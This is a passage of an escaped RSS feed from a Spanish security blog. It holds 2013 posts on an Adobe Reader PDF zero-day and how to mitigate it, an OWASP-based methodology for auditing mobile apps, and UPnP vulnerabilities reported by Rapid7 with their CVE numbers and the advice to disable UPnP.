&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;SOLUCIÓN&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por el momento no existe una solución, los desarrolladores de Adobe&amp;nbsp;&lt;b&gt;están&amp;nbsp;trabajando en el problema,&lt;/b&gt; y se espera que pronto lancen una actualización que resuelva el problema.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Mientras tanto,&lt;b&gt; se recomienda &lt;/b&gt;antes de abrir PDF, intentar verificar (si es o no de confianza) la página WEB y disponer de medidas de protección adicionales actualizadas como son:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;Sistema Antivirus actualizado.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Sistema de prevención de ejecución de "códigos" desconocidos. Como por ejemplo algunas de las herramientas que se han comentado en otra ocasión,&amp;nbsp;aquí&amp;nbsp;en el blog, en el artículo:&lt;/li&gt;
&lt;li&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bXyP63DtdyQ/UIkQAZjBQGI/AAAAAAAACg4/mOMu3d19Jpo/s1600/Exploitshields.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="159" src="http://3.bp.blogspot.com/-bXyP63DtdyQ/UIkQAZjBQGI/AAAAAAAACg4/mOMu3d19Jpo/s200/Exploitshields.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2 style="border-bottom-color: rgb(236, 236, 236); border-bottom-style: solid; border-width: 0px 0px 1px; color: #222222; font-family: LiberationSerifRegular, Arial, Tahoma, 'Century gothic', sans-serif; font-size: 24px; font-weight: normal; line-height: 28px; margin: 25px 20px 0px; outline: 0px; padding: 0px 0px 15px; text-align: start; vertical-align: baseline;"&gt;
&lt;a href="http://www.seguridadparatodos.es/2012/10/protegiendo-me-in-wild-con-antivirus.html" target="_blank"&gt;Protegiendo me "in the wild" con Antivirus, Antiexploits y ...&lt;/a&gt;&lt;/h2&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En San Valentín cuidado con los PDF "amorosos" que&amp;nbsp;recibís!! ;)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Más:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[1] &lt;a href="https://www.adobe.com/support/security/advisories/apsa13-02.html" target="_blank"&gt;Boletín de Seguridad de Adobe&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[2] &lt;a href="http://unaaldia.hispasec.com/2013/02/0-day-en-adobe-reader-y-nuevas.html?utm_source=FEED+RSS&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+hispasec%2FzCAd+%28%40unaaldia%29" target="_blank"&gt;Blog una al día de Hispasec&lt;/a&gt;.&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=rA-ksPBSaLk:bLDSY_fJuPU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=rA-ksPBSaLk:bLDSY_fJuPU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=rA-ksPBSaLk:bLDSY_fJuPU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=rA-ksPBSaLk:bLDSY_fJuPU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/rA-ksPBSaLk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/rA-ksPBSaLk/urgente-detectada-una-vulnerabilidad.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-NcYCSGL8XfA/TuxqSdg7EII/AAAAAAAABp8/sO1yBHvrB-U/s72-c/adobe_parche.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/02/urgente-detectada-una-vulnerabilidad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5851548237435225020</guid><pubDate>Wed, 13 Feb 2013 16:13:00 +0000</pubDate><atom:updated>2013-04-08T13:29:51.995+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Apps</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Moviles</category><category domain="http://www.blogger.com/atom/ns#">OWASP</category><category domain="http://www.blogger.com/atom/ns#">Metodología</category><category domain="http://www.blogger.com/atom/ns#">Parte 1</category><title>OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (I)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-oL6DkylroTM/UWKps6tEeNI/AAAAAAAAEQE/cZlhp_y8RBA/s1600/OWASP_Part1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-oL6DkylroTM/UWKps6tEeNI/AAAAAAAAEQE/cZlhp_y8RBA/s1600/OWASP_Part1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;INTRODUCCIÓN&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Imagino que muchos de los lectores ya&amp;nbsp;están&amp;nbsp;familiarizados con las principales amenazas o riesgos que se ciernen sobre los dispositivos móviles, siendo plenamente conscientes de la proliferación de aplicaciones infectadas con #malware que continuamente&amp;nbsp;acechan&amp;nbsp;a nuestros dispositivos&amp;nbsp;móviles.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;b&gt;&lt;span style="background-color: #073763; font-size: x-small;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: small; margin: 0px; padding: 0px; text-align: start;"&gt;Indice&lt;/b&gt;&lt;span style="border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte1MetodologiaAppMobile.html" style="border: 0px; color: #ff9d00; font-style: inherit; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (I)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;span style="border: 0px; font-style: inherit; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/02/OWASP-Parte2MetodologiaAppMobile.html" style="border: none; color: #006acd; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (II)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/04/OWASP-Parte3MetodologiaAppMobile.html" target="_blank"&gt;OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (III)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Las&amp;nbsp;estadísticas&amp;nbsp;de crecimiento auguran en los próximos años un crecimiento exponencial tanto en dispositivos móviles con sistemas Android / iOS como en malware especialmente diseñados para ellos. Así que cada vez se hace más necesario combatir y prevenir el #malware incluyendo en nuestros procedimientos de seguridad las aplicaciones de los dispositivos móviles corporativos y/o de empresa.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="http://3.bp.blogspot.com/-9ijvyGcEjBQ/UM7usnFiTzI/AAAAAAAADpM/0oz23vmAl5k/s1600/OWASP-Top_10_risks.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="241" src="http://3.bp.blogspot.com/-9ijvyGcEjBQ/UM7usnFiTzI/AAAAAAAADpM/0oz23vmAl5k/s320/OWASP-Top_10_risks.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="font-size: 13px;"&gt;OWASP Apps Mobile - Top 10 Risks&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para llevar a cabo nuestras&amp;nbsp;&lt;b&gt;Auditorias de Seguridad&lt;/b&gt;&amp;nbsp;sobre las aplicaciones para los dispositivos móviles de una forma&amp;nbsp;homogénea&amp;nbsp;y repetible, hace falta un&amp;nbsp;estándar&amp;nbsp;o metodología que establezca los pasos a seguir. A este respecto, &amp;nbsp;&lt;a href="https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide" target="_blank"&gt;OWASP&lt;/a&gt;&amp;nbsp;esta trabajando [en estado&amp;nbsp;&lt;b&gt;&lt;a href="https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide" target="_blank"&gt;borrador&lt;/a&gt;&lt;/b&gt;] en una guía de Seguridad que ayude a estandarizar y homogeneizar las pruebas que se realizan para el análisis&amp;nbsp;de seguridad en las aplicaciones móviles.&lt;br /&gt;
&lt;br /&gt;
Basándome&amp;nbsp;en dicha guía, he establecido una metodología que aplicada al desarrollo de aplicaciones móviles permitiría &lt;b&gt;identificar los puntos&amp;nbsp;débiles&amp;nbsp;del software&lt;/b&gt; y tomar las medidas necesarias para subsanar dichos errores antes de que el producto sea puesto en producción.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;METODOLOGÍA&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La metodología esta pensada para ser puesta en práctica desde el punto de vista de un desarrollador de aplicaciones. De esta forma la auditoria ideal de las aplicaciones móviles sería combinar el&amp;nbsp;&lt;b&gt;análisis&amp;nbsp;dinámico, estático y forense&lt;/b&gt;&amp;nbsp;para conseguir cubrir el mayor área (superficie) posible de ataque.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
&lt;i&gt;"&lt;b&gt;Análisis&amp;nbsp;dinámico&lt;/b&gt;&amp;nbsp;se utiliza para asegurar la calidad y seguridad de la aplicación software durante el proceso de ejecución, mientras que el&amp;nbsp;&lt;b&gt;Análisis&amp;nbsp;estático&lt;/b&gt;&amp;nbsp;es la revisión de la seguridad de la aplicación a través del código fuente de la misma, utilizado habitualmente durante la fase de desarrollo de la aplicación"&lt;/i&gt;&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Tomando como base la "&lt;b&gt;auditoria&amp;nbsp;ideal"&amp;nbsp;&lt;/b&gt;para el&amp;nbsp;análisis&amp;nbsp;de seguridad de las aplicaciones móviles, se construyen las siguiente&amp;nbsp;&lt;b&gt;&lt;u&gt;tres etapas&lt;/u&gt;&lt;/b&gt;&amp;nbsp;de una&amp;nbsp;Auditoria&amp;nbsp;para&amp;nbsp;aplicaciones&amp;nbsp;móviles:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;E1&lt;/b&gt;: Information Gathering&lt;/li&gt;
&lt;li&gt;&lt;b&gt;E2&lt;/b&gt;: Static Analysis&lt;/li&gt;
&lt;li&gt;&lt;b&gt;E3&lt;/b&gt;: Dynamic Analysis&lt;/li&gt;
&lt;/ul&gt;
A continuación se describen con detalle todas las etapas, incluyendo las actividades y tareas a realizar en cada una de ellas.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;E1: Information Gathering&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En la&amp;nbsp;&lt;b&gt;primera etapa&lt;/b&gt;&amp;nbsp;de la metodología se establece una serie de pasos y/o tareas que el auditor deberá realizar con el objetivo de prepararse para las siguiente fases de la metodología.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En esta etapa se llevará a cabo un&amp;nbsp;&lt;b&gt;reconocimiento de la aplicación&lt;/b&gt;&amp;nbsp;con objeto de identificar la magnitud y alcance de la aplicación. Será necesario la recopilación de la información que ayude a identificar la infraestructura que proporciona soporte a la aplicación así como sus posibles vectores de ataque, esta fase también es conocida como &amp;nbsp;la fase de "Reconocimiento".&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las Actividades y tareas a realizar durante esta etapa son:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;E1.A1&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Requisitos y/o&amp;nbsp;características&amp;nbsp;necesarias para la Auditoria&lt;/u&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;E1.A2&lt;/b&gt;:&amp;nbsp;&lt;u&gt;Análisis&amp;nbsp;de los requisitos de Comunicación&lt;/u&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style="text-align: start;"&gt;E1.A3&lt;/b&gt;&lt;span style="text-align: start;"&gt;:&amp;nbsp;&lt;/span&gt;&lt;u style="text-align: start;"&gt;Análisis&amp;nbsp;de las funcionalidades y/o&amp;nbsp;características&amp;nbsp;de la aplicación&lt;/u&gt;&lt;/li&gt;
&lt;li&gt;&lt;b style="text-align: start;"&gt;E1.A4&lt;/b&gt;&lt;span style="text-align: start;"&gt;:&amp;nbsp;&lt;/span&gt;&lt;u style="text-align: start;"&gt;Análisis&amp;nbsp;de la arquitectura software de la aplicación&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: start;"&gt;
En nuestro siguiente artículo se&amp;nbsp;describirán&amp;nbsp;las tareas asociadas a dichas actividades y se continuara con las siguientes etapas de la metodología.&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=mkQpGK-QajI:qptEGKJUCZ4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=mkQpGK-QajI:qptEGKJUCZ4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=mkQpGK-QajI:qptEGKJUCZ4:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=mkQpGK-QajI:qptEGKJUCZ4:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/mkQpGK-QajI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/mkQpGK-QajI/OWASP-Parte1MetodologiaAppMobile.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-oL6DkylroTM/UWKps6tEeNI/AAAAAAAAEQE/cZlhp_y8RBA/s72-c/OWASP_Part1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/02/OWASP-Parte1MetodologiaAppMobile.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-680943114703942940</guid><pubDate>Tue, 29 Jan 2013 18:20:00 +0000</pubDate><atom:updated>2013-01-29T19:25:59.705+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ciberseguridad</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Rapid7</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><category domain="http://www.blogger.com/atom/ns#">UPNP</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidades</category><title>Vulnerabilidad grave detectada en el protocolo UPnP</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-2BV4cKNxK1A/UQgMT_ZDAlI/AAAAAAAADyc/DLzHARo9lXg/s1600/Rapid_vul_UPnP.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="191" src="http://3.bp.blogspot.com/-2BV4cKNxK1A/UQgMT_ZDAlI/AAAAAAAADyc/DLzHARo9lXg/s320/Rapid_vul_UPnP.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Rapid7 ha publicado un whitepaper [&lt;a href="https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf" target="_blank"&gt;PDF&lt;/a&gt;] donde explican detalladamente todas y cada una de las vulnerabilidades encontradas en las diferentes implementaciones del protocolo UPnP.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las vulnerabilidades detectadas son:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Errores de programación en el protocolo SSDP (UPnP discovery Protocol) que puede ser utilizado por los atacante para provocar una DoS o ejecución de código arbitrario.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Existe una vulnerabilidad en &amp;nbsp;la interfaz de control de UPnP (SOAP) que expone la red privada a ataques desde Internet o incluso a la capacidad de extraer información sensible de la red privada.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Además, los errores (vulnerabilidades) encontradas en las implementaciones de UPnP HTTP y SOAP permiten a los atacantes llevar a cabo DoS o ejecución de código arbitrario.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
Estas vulnerabilidades &lt;u&gt;&lt;b&gt;han sido solucionadas en la versión 1.6.18 del kit de desarrollo de UPnP&lt;/b&gt;&lt;/u&gt;, sin embargo son muchos los dispositivos y fabricantes que implementan este protocolo y que por tanto tardarán cierto tiempo en actualizar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
No hay más que observar la siguiente gráfica para hacerse una idea de las distintas implementaciones del protocolo, que esta ampliamente&amp;nbsp;distribuido.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ayGtZEwOm-U/UQgPo6urVeI/AAAAAAAADyk/vOuRS0pfDII/s1600/Distribucion_UPnP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="390" src="http://3.bp.blogspot.com/-ayGtZEwOm-U/UQgPo6urVeI/AAAAAAAADyk/vOuRS0pfDII/s640/Distribucion_UPnP.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Por ejemplo&lt;/b&gt;: todos los router que instalan las operadores de telecomunicaciones tiene activado por defecto al protocolo UPnP, por lo que es muy probable que&amp;nbsp;&lt;b&gt;prácticamente&amp;nbsp;todas&lt;/b&gt; las línea de ADSL se vea afectadas en mayor o menor medida por estas vulnerabilidades.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Es por ello que existe un elevado grado de exposición lo que establece estas vulnerabilidades en una alta probabilidad de ataque, existiendo un alto impacto. Para apoyar esta apreciación, el Rapid7 ha incluido en el whitepaper unas pequeñas estadisticas, que copio a continuación:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-1NZeKRFWc4g/UQgRN2nYkeI/AAAAAAAADys/2rkJZtfGQ-A/s1600/UPnP_statics.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="http://3.bp.blogspot.com/-1NZeKRFWc4g/UQgRN2nYkeI/AAAAAAAADys/2rkJZtfGQ-A/s640/UPnP_statics.png" width="548" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Estadísticas&amp;nbsp;| Alto grado de exposición e Impacto.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Más Información sobre las vulnerabilidades:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;Exploitable Stack Overflow in the MiniUPnP SOAP Handler |&amp;nbsp;CVE-2013-0230.&lt;/li&gt;
&lt;li&gt;Denial of Service Flaws in the MiniUPnP SSDP Parser |&amp;nbsp;CVE-2013-0229.&lt;/li&gt;
&lt;li&gt;Exploitable Vulnerabilities in the Portable SDK for UPnP Devices SSDP Parser | CVE-2012-5965&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Solución&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;1. Esperar la actualización del fabricante.&lt;/div&gt;
&lt;div&gt;
&amp;nbsp;2. La opción más recomendada, es desactivar inmediatamente el protocolo UPnP en el dispositivo de comunicaciones.&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
